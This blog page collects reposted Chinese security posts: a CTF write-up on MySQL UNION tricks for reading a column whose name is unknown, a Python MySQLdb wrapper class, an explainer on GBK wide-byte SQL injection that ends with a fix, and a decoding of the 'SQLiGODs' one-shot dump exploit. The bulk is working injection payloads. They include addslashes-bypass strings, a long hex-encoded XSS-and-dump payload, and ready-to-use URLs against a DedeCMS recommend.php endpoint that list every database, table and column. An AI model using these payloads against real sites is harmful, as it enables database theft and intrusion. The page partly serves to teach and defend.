Mysql巧妙绕过未知字段名的技巧

发布时间:May 29, 2017 // 分类:转帖文章,mysql // No Comments

DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家。题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;

+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

from:secquan

兔大侠整理的MySQLdb Python封装类

发布时间:September 13, 2015 // 分类:工作日志,运维工作,开发笔记,代码学习,linux,python,windows,mysql // No Comments

我一直没弄明白一件事情,Python语言已经这么流行和成熟了,为什么使用MySQL的方式却如此原始。Python 2下大家推崇的依旧是使用MySQLdb这个第三方的模块,而其使用方式还是手写方法,没有一个比较权威的封装类。或许是我孤陋寡闻?

根据官方文档及一些网上的样例,兔哥整理了一个MySQLdb的封装类。基本上涵盖了常用的函数,一般开发应该够用了。

#!/usr/bin/env python
# -*- coding: utf-8 -*- 
u'''对MySQLdb常用函数进行封装的类
 
 整理者:兔大侠和他的朋友们(http://www.tudaxia.com)
 日期:2014-04-22
 出处:源自互联网,共享于互联网:-)
 
 注意:使用这个类的前提是正确安装 MySQL-Python模块。
 官方网站:http://mysql-python.sourceforge.net/
'''

import MySQLdb
import time

class MySQL:
    u'''对MySQLdb常用函数进行封装的类'''
    
    error_code = '' #MySQL错误号码

    _instance = None #本类的实例
    _conn = None # 数据库conn
    _cur = None #游标

    _TIMEOUT = 30 #默认超时30秒
    _timecount = 0
        
    def __init__(self, dbconfig):
        u'构造器:根据数据库连接参数,创建MySQL连接'
        try:
            self._conn = MySQLdb.connect(host=dbconfig['host'],
                                         port=dbconfig['port'], 
                                         user=dbconfig['user'],
                                         passwd=dbconfig['passwd'],
                                         db=dbconfig['db'],
                                         charset=dbconfig['charset'])
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            error_msg = 'MySQL error! ', e.args[0], e.args[1]
            print error_msg
            
            # 如果没有超过预设超时时间,则再次尝试连接,
            if self._timecount < self._TIMEOUT:
                interval = 5
                self._timecount += interval
                time.sleep(interval)
                return self.__init__(dbconfig)
            else:
                raise Exception(error_msg)
        
        self._cur = self._conn.cursor()
        self._instance = MySQLdb

    def query(self,sql):
        u'执行 SELECT 语句'     
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result

    def update(self,sql):
        u'执行 UPDATE 及 DELETE 语句'
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
            self._conn.commit()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result
        
    def insert(self,sql):
        u'执行 INSERT 语句。如主键为自增长int,则返回新生成的ID'
        try:
            self._cur.execute("SET NAMES utf8")
            self._cur.execute(sql)
            self._conn.commit()
            return self._conn.insert_id()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            return False
    
    def fetchAllRows(self):
        u'返回结果列表'
        return self._cur.fetchall()

    def fetchOneRow(self):
        u'返回一行结果,然后游标指向下一行。到达最后一行以后,返回None'
        return self._cur.fetchone()
 
    def getRowCount(self):
        u'获取结果行数'
        return self._cur.rowcount
                          
    def commit(self):
        u'数据库commit操作'
        self._conn.commit()
                        
    def rollback(self):
        u'数据库回滚操作'
        self._conn.rollback()
           
    def __del__(self): 
        u'释放资源(系统GC自动调用)'
        try:
            self._cur.close() 
            self._conn.close() 
        except:
            pass
        
    def  close(self):
        u'关闭数据库连接'
        self.__del__()
 

if __name__ == '__main__':
    '''使用样例'''
    
    #数据库连接参数  
    dbconfig = {'host':'localhost', 
                'port': 3306, 
                'user':'dbuser', 
                'passwd':'dbpassword', 
                'db':'testdb', 
                'charset':'utf8'}
    
    #连接数据库,创建这个类的实例
    db = MySQL(dbconfig)
    
    #操作数据库
    sql = "SELECT * FROM `sample_table`"
    db.query(sql);
    
    #获取结果列表
    result = db.fetchAllRows();
    
    #相当于php里面的var_dump
    print result
    
    #对行进行循环
    for row in result:
        #使用下标进行取值
        #print row[0]
        
        #对列进行循环
        for colum in row:
            print colum
 
    #关闭数据库
    db.close()

 

深入探究宽字节注入漏洞与修补原理

发布时间:April 27, 2015 // 分类:PHP,代码学习,转帖文章,mysql // No Comments

1、概述

主要是由于使用了宽字节编码造成的。

什么是字符集?

计算机显示的字符图形与保存该字符时的二进制编码的映射关系。

ASCII中,A(图形)对应编码0100000165)。

对于MYSQL数据库来说,涉及字符集的地方大致分为存储和传输时,即:

(1)存储在服务器端的数据是何种编码

(2)客户端和服务器交互的时候数据传输使用的编码。

 

2、MYSQL服务器端存储字符集

MYSQL服务器端进行数据存储时,允许在以下的级别设置字符集:

(1)服务器端字符集(character_set_server

(2)库字符集

(3)表字符集

(4)字段字符集

优先级为:字段----->------->-------->服务器

对应的语法是:

Create table test(
name varchar(20) charset gbk,
number varchar(10),
age int
)engine=innodb charset=utf-8 ;

3、客户端与服务器交互数据传输的字符集

存储时的字符集已经确定了,不会影响交互阶段的字符集。

MYSQL中,还有一个中间层的结构,负责客户端和服务器之间的连接,所以称为连接层。

交互的过程如下:

(1)客户端以某种字符集生成的SQL语句发送至服务器端,这个“某种字符集”其实是任意规定的,PHP作为客户端连接MYSQL时,这个字符集就是PHP文件默认的编码。

(2)服务器会将这个SQL语句转为连接层的字符集。问题在于MYSQL是怎么知道我们传过来的这个SQL语句是什么编码呢?这时主要依靠两个MYSQL的内部变量来表示,一个是character_set_client(客户端的字符集)和character_set_connection(连接层的字符集)。可以使用show variables like character_set_% ;进行查看。

可以看到,这里的客户端字符集为GBK,连接层字符集也是为GBK

两者相同,就不会有问题,如果不一致,就会出现乱码问题了。

使用MYSQL中的set命令可以对这些内部变量做设置,如修改客户端编码为UTF-8;

set character_set_client = UTF-8

(1)服务器将转换好的SQL语句,转为服务器内部编码与存储在服务器上的数据进行交互

(2)服务器处理完之后,将结果返回给客户端,还是转为服务器认为客户端可以认识的编码,如上图的GBK,使用character_set_results来确定返回客户端的编码。

平时在PHP中写的set names UTF-8相当于下面三条同时执行:

(1)set character_set_client = UTF-8

(2)set character_set_connection = UTF-8

(3)set character_set_results = UTF-8

 

4、乱码问题原理

设置三个字符集相同,这也就不会出现乱码的真正原理。网页上有时会出现乱码是因为PHP动态文件将数据打印到浏览器的时候,浏览器也会按照一定的字符集进行判断,如果PHP的响应数据编码和浏览器编码一致,就不会出现乱码,否则就出现乱码。可以通过在PHP中使用header()来指定这个响应数据的编码。

 

5、宽字节注入原理

有三种形式:

(1)情景一:在PHP中使用mysql_query(set names GBK);指定三个字符集(客户端、连接层、结果集)都是GBK编码。

情景代码: 

.....
mysql_query(“set names GBK”);
$bar = addslashes($_GET[‘bar’]) ;
$sql = “select password from user where bar=’{$bar}’”;
$res = mysql_query($sql) ;
......

提交:http://127.0.0.1/foo.php?bar=admin%df%27

这时,发生如下转换:

%df%27=====(addslashes)======>%df%5c%27======(GBK)======>

带入sql为:

Select password from user where bar=

成功将单引号闭合。为了避免漏洞,网站一般会设置UTF-8编码,然后进行转义过滤。但是由于一些不经意的字符集转换,又会导致漏洞。

 

(2)情景二:

使用set names UTF-8指定了UTF-8字符集,并且也使用转义函数进行转义。有时候,为了避免乱码,会将一些用户提交的GBK字符使用iconv函数(或者mb_convert_encoding)先转为UTF-8,然后再拼接入SQL语句。

情景代码:

....
mysql_query(“set names UTF-8”) ;
$bar =iconv(“GBK”,”UTF-8”, addslashes($_GET[‘’bar])) ;
$sql = “select password from user where bar=’{$bar}’” ;
$res = mysql_query($sql) ;
......

我们可以看到,为了使得SQL语句中的字符集保持一致,一般都会使用iconv等字符集转换函数进行字符集转换,问题就是出在了GBKUTF-8转换的过程中。

提交:http://127.0.0.1/foo.php?bar=%e5%5c%27

变换过程:(e55c转为UTF-8e98ca6

e55c27====(addslashes)====>e55c5c5c27====(iconv)====>e98ca65c5c27

可以看到,多出了一个5c,将转义符(反斜杠)本身转义,使得后面的%27发挥了作用。

测试如下:


 

 

(3)情景三:使用iconv进行字符集转换,将UTF-8转为GBK,同时,set names字符集为GBK。提交%e9%8c%a6即可。

这个情景的大前提是先编码后转义:

e98ca6====(iconv)=====>e55c=====(addslashes)====>e55c5c

同样可以多出一个反斜杠进行利用,在此不再详述,因为漏洞条件比较苛刻。

 

 

6、安全方案

对于宽字节编码,有一种最好的修补就是:

(1)使用mysql_set_charset(GBK)指定字符集

(2)使用mysql_real_escape_string进行转义

原理是,mysql_real_escape_stringaddslashes的不同之处在于其会考虑当前设置的字符集,不会出现前面e55c拼接为一个宽字节的问题,但是这个“当前字符集”如何确定呢?

就是使用mysql_set_charset进行指定。

上述的两个条件是“与”运算的关系,少一条都不行。

测试;

输出:

 

 

效果很明显。

from:http://write.blog.csdn.net/postedit/42874517

从SQLiGODS里面得到的一点tips

发布时间:April 26, 2015 // 分类:代码学习,mysql // No Comments

Referer:http://zone.wooyun.org/content/16039

这里介绍了一个exp,可以一次性dump出全部的数据。之前一直感觉很强大,各种膜拜。后来接触一段时间后打算深入地研究下具体的过程。于是有了此文

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

顺便把这个exp给解码了,发现一点有意思的



<script> name=prompt("Please Enter Your Name : "); url=prompt("Please Enter The Url you're trying to Inject and write 'makman' at your Injection Point, Example : http://site.com/file.php?id=-4 UNION SELECT 1,2,3,concat(6d616b,makman),5—+- NOTE : Just replace your Injection point with keyword 'makman'"); </script> , //熟悉的开始地方 <b> <font color=red>SQLiGODs Syntax V 1.0 By MakMan</font><br><br> <font color=green size=4>Injected by <script>document.write(name);</script></font><br> <table border="1"> <tr><td>DB Version : </td> <td><font color=blue> ,version(), </font></td></tr> //version() <tr><td> DB User : </td> <td><font color=blue> ,user(), </font></td></tr> //user() <tr><td>Primary DB : </td> <td><font color=blue> ,database(), </td></tr></table> <br>, //database() <font color=blue>Choose a table from the dropdown menu : </font> <br>,concat( <script> function toHex(str){ //转换为16进制 var hex =''; for(var i=0;i<str.length;i++){ hex += ''+str.charCodeAt(i).toString(16); } return hex; } function redirect(site){ maksplit=site.split("."); dbname=maksplit[0]; tblname=maksplit[1]; makrep="concat( IF(@tbl:="+toHex(tblname)+",0,0), IF(@db:="+toHex(dbname)+",0,0), concat( <script> url=""+toHex(url)+""; //对url进行编码 </script>),concat(concat( <script>db=",@db,";tbl=",@tbl,";</script>,<b> <font color=red> SQLiGODs Syntax V 1.0 By MakMan</font><br><br> Table Name : <font color=blue>,@tbl,</font> from database : <font color=blue>,@db,</font> <br>Number Of Columns : <font color=blue> <script> colcnt=",(SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl),"; //SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl //查询某个表的数目 document.write(colcnt);</script> </font>,<br>, (select (@x) from (select (@x:=00),(@chk:=1), (select (0) from (information_schema.columns) where (table_schema="+toHex(dbname)+") and (table_name="+toHex(tblname)+") and (00) in (@x:=concat_ws(20,@x,IF(@chk=1, <script> colname = new Array(); var i = 1;,20), colname[i] = ",column_name,"; i++;,IF(@chk:=2,20,20)))))x),for(i=1;i<=colcnt;i++){ document.write("<font color=green>"+i+". </font>"+colname[i]+"<br>");}</script> , concat(<b>,<script>query="";for(i=1;i<colcnt;i++){ // query=query+colname[i]+", :: ,"; } url=url.replace("'","%27"); dmpquery=url.replace("makman","(select(@) from(select(@:=00) ,(select (@) from("+db+"."+tbl+")where(@) in (@:=concat_ws(20,@,"+query+"<br>))))a)"); //把makman替换为sql语句,这里就是我们需要查询的关键了 document.write("<a href='"+dmpquery+"'>Click Here to Dump this whole Table<a>");</script>))))"; url=url.replace("'","%27"); urlpas1=url.replace("makman",makrep); window.open(urlpas1); } </script> <select onchange="redirect(this.value)"> <option value="mknone" selected>Choose a Table</option>, (select (@x) from (select (@x:=00), (select (0) from (information_schema.tables) where (table_schema!=information_schema) and (00) in (@x:=concat(@x, <option value=",UNHEX(HEX(table_schema)),.,UNHEX(HEX(table_name)),">,UNHEX(HEX(concat(Database :: ,table_schema, :: Table :: ,table_name))),</option>))))x),</select>), <br><br><br><br><br>

把这个拆解开来,发现了其中的关键部分就是

select(@) from(select(@:=00) ,(select (@) from(&quot;+db+&quot;.&quot;+tbl+&quot;)where(@) in (@:=concat_ws(20,@,&quot;+query+&quot;

然后自己本地测试发现的是这样子的

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema)))))x

列出全部的库

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name)))))x

列出全部的表

 

然后列出全部的库,表,字段就是这样子了

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name))) ) )x

数据太多,直接超时了

 

PS:当然这个的风险是很大的,比如我的CPU硬生生的耗完了

用到注入的地方,就是这样子。比如我们平时的都是这么注入的

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

利用上面的办法,我们来撸出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

当然还可以一次性列出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name,column_name)))))x),5,6,7,8,9%2

相关文档:

分类
最新文章
最近回复
  • 轨迹: niubility!
  • 没穿底裤: 好办法..
  • emma: 任务计划那有点小问题,调用后Activation.exe不是当前活动窗口,造成回车下一步下一步...
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...